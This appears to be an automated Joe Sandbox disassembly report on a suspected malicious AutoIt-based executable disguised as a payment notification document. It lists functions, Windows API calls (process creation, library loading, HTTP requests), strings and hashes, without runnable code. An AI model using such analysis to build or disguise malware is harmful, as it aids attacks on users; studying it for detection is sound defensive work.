String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 07cb7cb076872b9e5aa78e6f1e1b01786d2129a87a2798f39cb2769b28823ade
Instruction ID: 8c4459560493e6310f950bd8dbcae5e27c133d2ef2dd6cd236751bcfa094dc9b
Opcode Fuzzy Hash: 07cb7cb076872b9e5aa78e6f1e1b01786d2129a87a2798f39cb2769b28823ade
Instruction Fuzzy Hash: B57117B260016A8BCB20DEBCCD516BF3399AFA1754F150528FCE6DB284E635CD40D3A1

Function 0097833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0097835A
_wcslen.LIBCMT ref: 0097836E
_wcslen.LIBCMT ref: 00978391
_wcslen.LIBCMT ref: 009783B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009783F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0097361A,?), ref: 0097844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00978487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 009784CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00978501
FreeLibrary.KERNEL32(?), ref: 0097850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0097851D
DestroyIcon.USER32(?), ref: 0097852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00978549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00978555

Strings

.dll, xrefs: 009783AB
.icl, xrefs: 00978368
.exe, xrefs: 00978388

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 1a17e91991b1d30dc8efcdaa8ec9364956aec7ff4de4caabbba3b9b9366e50be
Instruction ID: 5392ec6da03866de8e1c0166535c5e0d954c4588b977fb8ce0a243bef75b9ab6
Opcode Fuzzy Hash: 1a17e91991b1d30dc8efcdaa8ec9364956aec7ff4de4caabbba3b9b9366e50be
Instruction Fuzzy Hash: 6661D0B2644205BEEB14DF64CC8ABBF77ACFB44B11F108549F919D60E1DBB4A980D7A0

Function 008E7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#include-once, xrefs: 008E782F
#include, xrefs: 008E7847
#ce, xrefs: 008E78ED
#comments-end, xrefs: 008E78D9
", xrefs: 00925153
Bad directive syntax error, xrefs: 0092519A
#OnAutoItStartRegister, xrefs: 008E7817
#notrayicon, xrefs: 008E77E7
Cannot parse #include, xrefs: 00925279
#requireadmin, xrefs: 008E77FF
Unterminated group of comments, xrefs: 0092528C
#cs, xrefs: 008E7873, 008E78C5
#pragma compile, xrefs: 008E77D3
#comments-start, xrefs: 008E785F, 008E78B1
', xrefs: 00925169

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 130dac210a322ab66eca17c7526f008890287cf13fdf67bc7dfd6f6968ebb9dc
Instruction ID: 5b4a89b3e3d20b8770132fbfbf269f92867c1f182370e53a97fcd215d91e8236
Opcode Fuzzy Hash: 130dac210a322ab66eca17c7526f008890287cf13fdf67bc7dfd6f6968ebb9dc
Instruction Fuzzy Hash: 4281D171604219BFDB21AF65DC42FAF37A8FF96304F054024F909EA196EB70DA51C7A1

Function 00945A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00945A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00945A40
SetWindowTextW.USER32(?,?), ref: 00945A57
GetDlgItem.USER32(?,000003EA), ref: 00945A6C
SetWindowTextW.USER32(00000000,?), ref: 00945A72
GetDlgItem.USER32(?,000003E9), ref: 00945A82
SetWindowTextW.USER32(00000000,?), ref: 00945A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00945AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00945AC3
GetWindowRect.USER32(?,?), ref: 00945ACC
_wcslen.LIBCMT ref: 00945B33
SetWindowTextW.USER32(?,?), ref: 00945B6F
GetDesktopWindow.USER32 ref: 00945B75
GetWindowRect.USER32(00000000), ref: 00945B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00945BD3
GetClientRect.USER32(?,?), ref: 00945BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00945C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00945C2F

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: fc5388e9e77125514346ceddbeb00f9334c3be68c46f9b8a1cad4a65492540d0
Instruction ID: 7cb1cb004e8e70506b8541f405d11df5015674f2eb64001ba2fb0ee8d9f5a1b7
Opcode Fuzzy Hash: fc5388e9e77125514346ceddbeb00f9334c3be68c46f9b8a1cad4a65492540d0
Instruction Fuzzy Hash: C5717C71900B09AFDB20DFA8CE85E6EBBF9FF48704F114A1CE586A25A1D775E940CB10

Function 009000C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 009000C6

Part of subcall function 009000ED: InitializeCriticalSectionAndSpinCount.KERNEL32(009B070C,00000FA0,A74B209B,?,?,?,?,009223B3,000000FF), ref: 0090011C
Part of subcall function 009000ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,009223B3,000000FF), ref: 00900127
Part of subcall function 009000ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,009223B3,000000FF), ref: 00900138
Part of subcall function 009000ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0090014E
Part of subcall function 009000ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0090015C
Part of subcall function 009000ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0090016A
Part of subcall function 009000ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00900195
Part of subcall function 009000ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009001A0

___scrt_fastfail.LIBCMT ref: 009000E7

Part of subcall function 009000A3: __onexit.LIBCMT ref: 009000A9

Strings

InitializeConditionVariable, xrefs: 00900148
WakeAllConditionVariable, xrefs: 00900162
kernel32.dll, xrefs: 00900133
SleepConditionVariableCS, xrefs: 00900154
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00900122

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 7918f89307d60963ad5baefd8b02c012ae62bbc02a9ec8af9477d2c2bda33536
Instruction ID: 0c25e94b647f3e5a6ba9e183c9b154ee8945522f122c3881eed56263b03707cd
Opcode Fuzzy Hash: 7918f89307d60963ad5baefd8b02c012ae62bbc02a9ec8af9477d2c2bda33536
Instruction Fuzzy Hash: F821297365C7106FD7205BB4AC4AB6A73A8EFC6B64F00413AF909E72D1DF7098009A90

Function 009430F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0094318D
_wcslen.LIBCMT ref: 009431F8

Strings

INSTANCE, xrefs: 00943453
CLASS, xrefs: 00943188, 009431A5
REGEXPCLASS, xrefs: 00943255, 00943266
TEXT, xrefs: 0094347C
NAME, xrefs: 00943335, 00943346
CLASSNN, xrefs: 009431F3, 00943204

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 4e3a3b148982f0ba8b0942e441055e2bf00e267df2b25619cb7299dc79206d7b
Instruction ID: 22e996ddf934af75e2f4891e1597d999a71b33ea2fd5e63b9a33bc259995b6b9
Opcode Fuzzy Hash: 4e3a3b148982f0ba8b0942e441055e2bf00e267df2b25619cb7299dc79206d7b
Instruction Fuzzy Hash: 75E1F532A00516ABCB289F78C451FEDBBB8FF45710F54C129E566E7290DB70AE8587A0

Function 009544C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0097CC08), ref: 00954527
_wcslen.LIBCMT ref: 0095453B
_wcslen.LIBCMT ref: 00954599
_wcslen.LIBCMT ref: 009545F4
_wcslen.LIBCMT ref: 0095463F
_wcslen.LIBCMT ref: 009546A7

Part of subcall function 008FF9F2: _wcslen.LIBCMT ref: 008FF9FD

GetDriveTypeW.KERNEL32(?,009A6BF0,00000061), ref: 00954743

Strings

ramdisk, xrefs: 009546F1
fixed, xrefs: 00954635, 0095463A
removable, xrefs: 009545EA, 009545EF
network, xrefs: 0095469D, 009546A2
cdrom, xrefs: 0095458F, 00954594
all, xrefs: 00954531, 00954536
unknown, xrefs: 00954708

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: ab7dba65affa20ebe7dd391cb70c7c54d82c3466c34f6c297b9958b32d1b1e4c
Instruction ID: 26c53baa0af21e40001631192da74509bb44a69a8bfde2b899d56d865e7bdf82
Opcode Fuzzy Hash: ab7dba65affa20ebe7dd391cb70c7c54d82c3466c34f6c297b9958b32d1b1e4c
Instruction Fuzzy Hash: D5B138316083029FC750DF2AC890A6AB7E8FF96759F50491DF996C7291E730DC89CB92

Function 0096AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0096B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0096B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0096B1D4
_wcslen.LIBCMT ref: 0096B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0096B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0096B236
_wcslen.LIBCMT ref: 0096B332

Part of subcall function 009505A7: GetStdHandle.KERNEL32(000000F6), ref: 009505C6

_wcslen.LIBCMT ref: 0096B34B
_wcslen.LIBCMT ref: 0096B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0096B3B6
GetLastError.KERNEL32(00000000), ref: 0096B407
CloseHandle.KERNEL32(?), ref: 0096B439
CloseHandle.KERNEL32(00000000), ref: 0096B44A
CloseHandle.KERNEL32(00000000), ref: 0096B45C
CloseHandle.KERNEL32(00000000), ref: 0096B46E
CloseHandle.KERNEL32(?), ref: 0096B4E3

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 58f1b2b817a7c3324864c84ee714f39869d36ba6796af844108264ce27383388
Instruction ID: c1dd8dc48dca4213bd08d5eb01406b61a58214a16dc8d8ad9d2c7eeb2395b445
Opcode Fuzzy Hash: 58f1b2b817a7c3324864c84ee714f39869d36ba6796af844108264ce27383388
Instruction Fuzzy Hash: 54F18E716083409FC714EF29C891B2ABBE5FF85714F14855DF9998B2A2DB31DC84CB52

Function 008E326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(009B1990), ref: 00922F8D
GetMenuItemCount.USER32(009B1990), ref: 0092303D
GetCursorPos.USER32(?), ref: 00923081
SetForegroundWindow.USER32(00000000), ref: 0092308A
TrackPopupMenuEx.USER32(009B1990,00000000,?,00000000,00000000,00000000), ref: 0092309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009230A9

Strings

0, xrefs: 008E327D

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 5f47c58cf50eb70633ae711e3d11f45c265214505073f5eb137ff6aba222c990
Instruction ID: a4228584f9b47cf262377b6cb2130d09c9e9acd5e58a3034a3a80341c992ae76
Opcode Fuzzy Hash: 5f47c58cf50eb70633ae711e3d11f45c265214505073f5eb137ff6aba222c990
Instruction Fuzzy Hash: 8E714B71644215BEEB258F25DD89FAABF78FF01324F204206F618AB1E0C7B1AD50DB50

Function 00976CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00976DEB

Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00976E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00976E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00976E94
DestroyWindow.USER32(?), ref: 00976EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008E0000,00000000), ref: 00976EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00976EFD
GetDesktopWindow.USER32 ref: 00976F16
GetWindowRect.USER32(00000000), ref: 00976F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00976F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00976F4D

Part of subcall function 008F9944: GetWindowLongW.USER32(?,000000EB), ref: 008F9952

Strings

0, xrefs: 00976D98
tooltips_class32, xrefs: 00976E58, 00976EDD

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 881a5507634c9c7e4e9f13044825debc907b8069939d32962bfabd576c858c90
Instruction ID: aa9af0f17ab9ad994b1b4a5bfa2617feffd31e0b601a8d2eede28653ed9b4aa7
Opcode Fuzzy Hash: 881a5507634c9c7e4e9f13044825debc907b8069939d32962bfabd576c858c90
Instruction Fuzzy Hash: 2F719872108241AFDB21DF28DC58FBABBF9FB89304F54491DF98987261C770A949DB12

Function 0097911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2

DragQueryPoint.SHELL32(?,?), ref: 00979147

Part of subcall function 00977674: ClientToScreen.USER32(?,?), ref: 0097769A
Part of subcall function 00977674: GetWindowRect.USER32(?,?), ref: 00977710
Part of subcall function 00977674: PtInRect.USER32(?,?,00978B89), ref: 00977720

SendMessageW.USER32(?,000000B0,?,?), ref: 009791B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009791BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009791DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00979225
SendMessageW.USER32(?,000000B0,?,?), ref: 0097923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00979255
SendMessageW.USER32(?,000000B1,?,?), ref: 00979277
DragFinish.SHELL32(?), ref: 0097927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00979371

Strings

@GUI_DROPID, xrefs: 0097929E
@GUI_DRAGFILE, xrefs: 00979320
@GUI_DRAGID, xrefs: 009792E9

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 2424a737f415793f12bf81c857d228040e314df25651628c6fd729f5ad84b8d8
Instruction ID: 164424bc6c56d67bc44ed3bc987c83d7326fe63b13c16e1a7229142288485ffb
Opcode Fuzzy Hash: 2424a737f415793f12bf81c857d228040e314df25651628c6fd729f5ad84b8d8
Instruction Fuzzy Hash: 31616772108341AFC701EF65DC85DAFBBE8FB89750F40092EF5A5921A1DB709A49CB92

Function 0095C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0095C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0095C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0095C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0095C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0095C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0095C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0095C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0095C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0095C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0095C5F0
InternetCloseHandle.WININET(00000000), ref: 0095C5FB

Strings

, xrefs: 0095C575

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: f5a7d149d1954c0613666d99f44cd73ae2fabff037be8b3c293921af234f0a79
Instruction ID: 7668a32dc1b8551235d73459f09717a4b6dd8ab2bcc04911e9db3adca0b70243
Opcode Fuzzy Hash: f5a7d149d1954c0613666d99f44cd73ae2fabff037be8b3c293921af234f0a79
Instruction Fuzzy Hash: E7514EF1504305BFDB21CFA6C988AAB7BBCFF04755F00441DF94996250EB34EA49AB60

Function 0097856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00978592
GetFileSize.KERNEL32(00000000,00000000), ref: 009785A2
GlobalAlloc.KERNEL32(00000002,00000000), ref: 009785AD
CloseHandle.KERNEL32(00000000), ref: 009785BA
GlobalLock.KERNEL32(00000000), ref: 009785C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 009785D7
GlobalUnlock.KERNEL32(00000000), ref: 009785E0
CloseHandle.KERNEL32(00000000), ref: 009785E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 009785F8
OleLoadPicture.OLEAUT32(?,00000000,00000000,0097FC38,?), ref: 00978611
GlobalFree.KERNEL32(00000000), ref: 00978621
GetObjectW.GDI32(?,00000018,000000FF), ref: 00978641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00978671
DeleteObject.GDI32(00000000), ref: 00978699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009786AF

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: ab53067a0da2a6176adf8170022cfd5fc2b7841b4e53842fe4a3225d3e9f7760
Instruction ID: 095435c52bee59a0c49331333d9c2b7a8e4b5584771e5023529c82313f390eac
Opcode Fuzzy Hash: ab53067a0da2a6176adf8170022cfd5fc2b7841b4e53842fe4a3225d3e9f7760
Instruction Fuzzy Hash: B54118B6644205BFDB119FA5CC8CEAB7BBCEF89B15F108058F919E7260DB309941DB60

Function 009514BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00951502
VariantCopy.OLEAUT32(?,?), ref: 0095150B
VariantClear.OLEAUT32(?), ref: 00951517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 009515FB
VarR8FromDec.OLEAUT32(?,?), ref: 00951657
VariantInit.OLEAUT32(?), ref: 00951708
